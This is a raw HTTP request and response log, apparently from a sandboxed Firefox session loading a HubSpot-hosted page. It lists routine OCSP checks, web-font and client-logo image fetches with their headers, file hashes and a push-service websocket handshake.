Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "33A4992A1A677347D3409A398039ABB3F943F9B7FEFA5D65FB5E29E99E7E9FF6"
Last-Modified: Wed, 14 Sep 2022 01:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21600
Expires: Thu, 15 Sep 2022 15:56:51 GMT
Date: Thu, 15 Sep 2022 09:56:51 GMT
Connection: keep-alive

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLDz8Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 7840
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:31:02 GMT
expires: Thu, 14 Sep 2023 19:31:02 GMT
cache-control: public, max-age=31536000
age: 51949
last-modified: Wed, 27 Apr 2022 16:51:55 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 7840, version 1.0\012- data
Size:   7840
Md5:    8d91ec1ca2d8b56640a47117e313a3e9
Sha1:   a9e9bafe64666f4595051a0e895b47a5fa39e67e
Sha256: 78bc3aa78faec288bbb3bf26c9a0fa4eb67b1e69da94a17233c5cab60525efdb
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/qualio-01.png?width=216&height=60&name=qualio-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2868
cf-ray: 74b07eaf3d21b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75317
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="qualio-01.webp"
etag: "e31e7490353b4655f5ea5ec34be34e50"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 736ad67f05a9a5a8fd5ed8cba30196f4.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555223454,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=8692
edge-cache-tag: F-9555223454,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: IG7oRhGd0rt0xNXk7Okgc3dIcMqotqkaJLFlTmb0VKKStL7a9VJPkg==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2868
Md5:    2968c5068d55383be7df5b6edeedbec5
Sha1:   1aa3f7d2b597f4952402372d641bce5b47693119
Sha256: 746b0e9d3c407413c00d624f2e4f50a137f981a8eddc23aeedd625074942ad39
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-airbnb-01.png?width=216&height=68&name=logo-airbnb-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2536
cf-ray: 74b07eaf5d5db527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75318
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-airbnb-01.webp"
etag: "8272f107647148a70bf19428d65408d9"
last-modified: Tue, 14 May 2019 15:32:25 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 0501dadffc52b06a0cf6aadc57586acc.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589325565,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=7383
edge-cache-tag: F-6589325565,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: De3VeFTJF9Nw-18aUmR4I4ttZ4nTX-YS1wZCChOA3XPb12XbUrp3aQ==
x-amz-cf-pop: IAD89-P1
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2536
Md5:    1a4cc65de36d8bcd2eb456231b373d17
Sha1:   3495f83209d24b6ce75d0b87c83805117004ab13
Sha256: 846b71545820c891fd3bc6a00da4ea1d5743f0bdfd1401937d5beeb3749c3fc0
                                        
                                            GET /hub/275827/hubfs/sr-assets/images/sr-logo@2x.png?width=220&height=50&name=sr-logo@2x.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 3732
cf-ray: 74b07eaf4d5cb527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75318
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="sr-logo@2x.webp"
etag: "59c1225e9f3a62bab92559267927d780"
last-modified: Tue, 06 Sep 2022 02:12:34 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 e21fbbed60133ff896ee44224814dc5c.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9889655840,FD-9889336472,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=13061
edge-cache-tag: F-9889655840,FD-9889336472,P-275827,FLS-ALL
x-amz-cf-id: RePgr6s-4k_9ZJTuSjFcVo3yyJ7qxdFtJcxYGaJhejE28TNQvi6nVQ==
x-amz-cf-pop: IAD12-P3
x-amz-server-side-encryption: AES256
x-amz-storage-class: INTELLIGENT_TIERING
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   3732
Md5:    063485242fc42d804986b23d560573e8
Sha1:   70e915df8932e3346959fc922309a6b6710c0b41
Sha256: 95a4d783c21a40bf91f5312cf1ad9beaf702be65f04bc7214a277795d536c624
                                        
                                            GET /s/poppins/v20/pxiByp8kv8JHgFVrLEj6Z1xlFQ.woff2 HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://news4kcnn.hs-sites-eu1.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.163
HTTP/2 200 OK
content-type: font/woff2
                                        
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 8000
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 14 Sep 2022 19:30:59 GMT
expires: Thu, 14 Sep 2023 19:30:59 GMT
cache-control: public, max-age=31536000
age: 51952
last-modified: Wed, 27 Apr 2022 16:59:07 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 8000, version 1.0\012- data
Size:   8000
Md5:    72993dddf88a63e8f226656f7de88e57
Sha1:   179f97ec0275f09603a8db94d4380eb584d81cd5
Sha256: f4e80d9dfd374d02989b87a27b5ed4cb78fbb177c27f1478e9a8b0afb7513149
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-alphabet-01.png?width=216&height=56&name=logo-alphabet-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2300
cf-ray: 74b07eaf5d60b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75318
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-alphabet-01.webp"
etag: "4e953fa65bb59372af3fda0982b27093"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 36b04143ac1626bb30bb225fb2cccb1e.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589371902,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6837
edge-cache-tag: F-6589371902,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: cY7UOLJHa20H1mcl2Co5yn0ClpUVBSOyYampxPkiYyTeuZxyxp3zLA==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2300
Md5:    ca39d37fd2b94ce26df4357045b1c80b
Sha1:   7ce08836730461305cda41b524f22dc497899c74
Sha256: 8d8eda0dd2720b65ee680d0ae28536401a8a2f38730b9055e3953c1ba734d43a
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-fitbit-01.png?width=216&height=60&name=logo-fitbit-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2088
cf-ray: 74b07eaf5d5eb527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75318
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-fitbit-01.webp"
etag: "550dec525dbee69d80c98a38027d6632"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 dfc1931cc62ecd4133c2b9bdae1bb476.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589324599,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6233
edge-cache-tag: F-6589324599,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: eQLJAmFzguPdEXKsrpHLsy5eEvzoxlLOlodxrOQcPxI4P3684cqPmw==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2088
Md5:    c3670ba0b7439b0f226113351eaea7cc
Sha1:   1b2e2724370323192c04714a46459e8c547b34c9
Sha256: 81b5ba6fe680add910fbc5cb54ded0927c7877427222f80fb1d2fb87b6b47ced
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/smartmail-01.png?width=216&height=48&name=smartmail-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2058
cf-ray: 74b07eaf3d26b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75317
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="smartmail-01.webp"
etag: "cea6cb5f7cf365a77bfbd59e3bbf1cd4"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 3d4bfc42e9575ee1f9559241c9e3f464.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555425370,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=5846
edge-cache-tag: F-9555425370,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: uvFQYdfYk5kpkQTNroMb8cJONwjnofFVO8zeQ_CXgsLecb4ColHHZw==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2058
Md5:    b9de48b252120fc5c381efef8b31a090
Sha1:   0611ffc3e95d5d607bb0ba17849105fa20ca33c9
Sha256: c2d59834fe4a5b9c001fbc46c1bf9c40254365be7e03f79f27bbaf2758e93e75
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/precision-hawk-01.png?width=216&height=20&name=precision-hawk-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2860
cf-ray: 74b07eaf3d24b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75317
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="precision-hawk-01.webp"
etag: "a23bf1a95aac0362a9f667252a32c368"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 979084a90b32fe3f5fdc377fb6e67b76.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555223614,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=6523
edge-cache-tag: F-9555223614,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: acQyKRdQy8n28pvLbRB_1W6BrYGBUjJwx1B4qv5zKJhk29-9Xy05Nw==
x-amz-cf-pop: IAD89-P1
x-cache: Hit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2860
Md5:    36454962763724292d451e1542478eda
Sha1:   14a93c0719abb4c844cf2861d28a99bc9759c8a2
Sha256: ed1d4dbb208eca6bcbd25f6b993d4beb45dfd46294d6cf665165949ce2dbc0db
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-spotify-01.png?width=216&height=68&name=logo-spotify-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2986
cf-ray: 74b07eaf3d27b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 34293
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-spotify-01.webp"
etag: "a1592701d935fbadf835d03aa211d076"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 36b04143ac1626bb30bb225fb2cccb1e.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589181538,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=8322
edge-cache-tag: F-6589181538,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: we2BquQXwoLe3fg34ENcuoFHfbVi_7bLcvSYE826RVBhUeAARzXY6Q==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2986
Md5:    d21cd989231d49f2b0a8cba74cfd855a
Sha1:   7f7186cbe3cead782a96c94542dfe3d98bc766e9
Sha256: e8c738a8ae44e7ba822af4fdeb65e79bc3f6f6c6dd392652ec60db2268416cc0
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/hirevibe-01.png?width=146&height=76&name=hirevibe-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 1514
cf-ray: 74b07eaf3d23b527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75317
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="hirevibe-01.webp"
etag: "f4a30fecd8660f5da52c510403afdf91"
last-modified: Tue, 14 May 2019 15:32:27 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 16df6ade68382d048f8aad1f7e39da28.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-9555291586,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=4194
edge-cache-tag: F-9555291586,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: o1LH6fZtxmzVKotaOMr8Pns9286gTyi_I2C1qI6Ib0QI-4JiamsLfA==
x-amz-cf-pop: IAD12-P3
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   1514
Md5:    cf95d3460c4507a59e3a53c64466047d
Sha1:   b0c84c4e9fbdfd64529a3a2c70fde1c35d7d2aa3
Sha256: acf2f13e778a3ac3199b8b252a2387e8da87f68c96faa4ee91dfac736b300bac
                                        
                                            GET /hub/275827/hubfs/sr-assets/pattern-library/sr-clients/logo-slack-01.png?width=216&height=64&name=logo-slack-01.png HTTP/1.1 
Host: f.hubspotusercontent20.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://news4kcnn.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         104.16.187.114
HTTP/2 200 OK
content-type: image/webp
                                        
date: Thu, 15 Sep 2022 09:56:51 GMT
content-length: 2712
cf-ray: 74b07eaf3d1eb527-OSL
accept-ranges: bytes
access-control-allow-origin: *
age: 75318
cache-control: s-maxage=1814400, max-age=1209600, stale-while-revalidate=900
content-disposition: inline; filename="logo-slack-01.webp"
etag: "c4851337bcccecc573e6d5000a91d1cc"
last-modified: Tue, 14 May 2019 15:32:26 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept, Accept-Encoding
via: 1.1 4ee1745ee3cece0fab563f5a32ba165a.cloudfront.net (CloudFront)
cf-cache-status: HIT
access-control-allow-methods: GET
cache-tag: F-6589325566,FD-6589324589,P-275827,FLS-ALL
cf-bgj: imgq:85,h2pri
cf-polished: origFmt=png, origSize=7403
edge-cache-tag: F-6589325566,FD-6589324589,P-275827,FLS-ALL
x-amz-cf-id: Rf5Us9FtVhrZl2bTlpgSu5PMByOJTihmL9scwpXYo0oKv-FJOHg7yQ==
x-amz-cf-pop: IAD89-P1
x-cache: RefreshHit from cloudfront
x-hs-cf-lambda: us-east-1.enforceAclForReadsProd 15
x-hs-cf-lambda-enforce: us-east-1.enforceAclForReadsProd 15
server: cloudflare
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  RIFF (little-endian) data, Web/P image\012- data
Size:   2712
Md5:    26c33a2db64c1505a595cb4f032a54f1
Sha1:   2f07c444199d6702134b09c7b77a8a238a759dee
Sha256: 0748925f859d667671134df87b07e461704c02b6401b3ee246434c00e6dc06cc
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 15 Sep 2022 09:56:51 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 3050
Cache-Control: 'max-age=158059'
Date: Thu, 15 Sep 2022 09:56:51 GMT
Last-Modified: Thu, 15 Sep 2022 09:06:01 GMT
Server: ECS (ska/F708)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET / HTTP/1.1 
Host: push.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: K3hCpI52uoIOZbNZXpZm4w==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket

                                         
                                         54.187.71.185
HTTP/1.1 101 Switching Protocols
                                        
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 9r2js9+xsMU/LmY2QcyDd7cHeZ4=

                                        
